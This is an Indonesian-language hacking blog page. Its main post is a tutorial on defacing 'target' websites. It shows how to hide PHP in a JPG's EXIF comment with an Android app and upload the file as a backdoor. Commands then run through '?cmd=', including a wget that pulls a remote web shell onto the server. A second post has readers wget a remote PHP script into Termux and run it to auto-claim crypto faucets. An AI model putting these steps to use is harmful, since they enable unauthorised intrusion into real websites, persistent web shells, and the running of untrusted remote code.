dios sql injection list
kumpulan dios sql injection
Tampilkan postingan dengan label tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label tutorial. Tampilkan semua postingan
Jumat, 07 Februari 2020
Senin, 15 April 2019
cara inject php ke jpg di android
Pasti sebangian dari ente pasti pernah mengpload sebuah file / shell pada website target deface dengan tujuan membuat backdoor pada website tersebut,akan tetapi gagal karena extensi file nya berbeda wkwkwkw :v.Biasanya untuk mengatasi hal yang seperti ini bisa menggunakan teknik tamper data atau http live header,tetapi tidak banyak website bisa menggunakan cara ini juga apa lagi melalui android.
Oke disini ane share bagaimana cara lain untuk bypass extensi file nya agar ke upload pada website target ente :v,tetapi ane juga kgk menjamin 100% berhasil juga.Lanjut untuk cara inject php ke file jpg nya.Oh iya sebelum itu ente harus menginstal aplikasi wajibnya dulu yaitu FAST PHOTO TAGGER di android ente dan juga file jpg (gambar terserah yang penting extensinya jpg/jpeg bukan png).
1.Buka aplikasi fast photo taggernya,pilih menu setting terlebih dahulu untuk mengatur metadatanya.
2.Pilih pada bagian menu metadata tags.
3.Centang pada bagian Comment.setelah itu kembali lagi pada menu utama aplikasinya.
4.kemudian pilih gambar yang ingin ente inject dengan file php dengan cara tekan tahan pada gambar yang ingin ente inject.
5.Setelah itu akan muncul menu metadata ,dan pilih menu Use Fast Tagger.
6.Pada bagian comment masukan kode php nya.untuk menyimpan hasilnya tekan tombol/back kembali pada android ente.
7.Jika sudah pilih menu app kemudian rename filenya.
8.rename filenya dengan extensi php agar bisa dijalankan.
Jika sudah selesai untuk mengetest filenya ente bisa mengunakan sever local host ente masing masing atau bisa juga menggunakan notepad++ di android untuk melihat isi filenya sudah tertanem pada file gambarnya atau belum.Cara pemanggilan /perintahnya yaitu cukup menamnbahkan ?cmd= pada akhir .
contohnya : https://www.target.co.li/[path]/[path]/namafile.php?cmd=
Beberapa perintah yang sering digunakan yaitu:
?cmd=ls ===>untuk melihat list file di dalam direktorinya
?cmd=ls -al ===>untuk melihat file dan permision(izin) filenya
?cmd=wget www.website.co.li/shell.txt -o shell.php ===>untuk mengambil sebuah materi dari sebuah website fungsi -o yaitu menggubah file extensi dari txt menjadi php,atau juga bisa menggunakan curl sebagai ganti wget .keduanya fungsinya sama saja ,kalau ane sering menngunakan curl.
Selanjutnya apa?.kalo udah gitu mau ngapain kalo tidak dipraktekin :v.Ok mamank sekian dulu tutor dari ane semoga bermanfaat bagi kalian semua.
Kamis, 13 Desember 2018
autoclaim faucet di faucethub
List situs auto faucet faucethub
bagi temen temen yang suka main faucet,ada beberapa faucet tanpa harus ribet claim fan click shortlink yang bikin spaneng :D.cara claimnya juga cukup mudah ,temen temen tinggal pilih coin yang mau di claim ke faucethub kemudian masukin wallet addres milik temen temen dan klik claim.main faucet memang mengahasilkan tidak seberapa ibarat sedikit sedikit lama lama jadi bukit :D toh juga wd kalo dah banyak koinnya hehhehe.untuk temen temen yang belum punya akun faucethub bisa daftar disini (FAUCETHUB).autoclaim faucet ini bisa dituyul juga / claim auto tanpa harus nungguin di browser.caranya temen temen download dulu termux di playstore.kemudian masukin commandnya ke termux.
- apt install wget
- apt install php
- wget -O (huruf O bukan angka 0) tuyul.php https://raw.githubusercontent.com/ipkzone/script/master/claim.php
- kemudian ketik php claim.php
- masukin url situs autoclaimnya.
untuk list situsnya mungkin ada beberapa yang munurut ane masih bisa di claim di termux.
list situs autoclaim :
nah itulah bebearapa list faucet autoclaim faucethub.sekian dulu untuk post kali ini :D
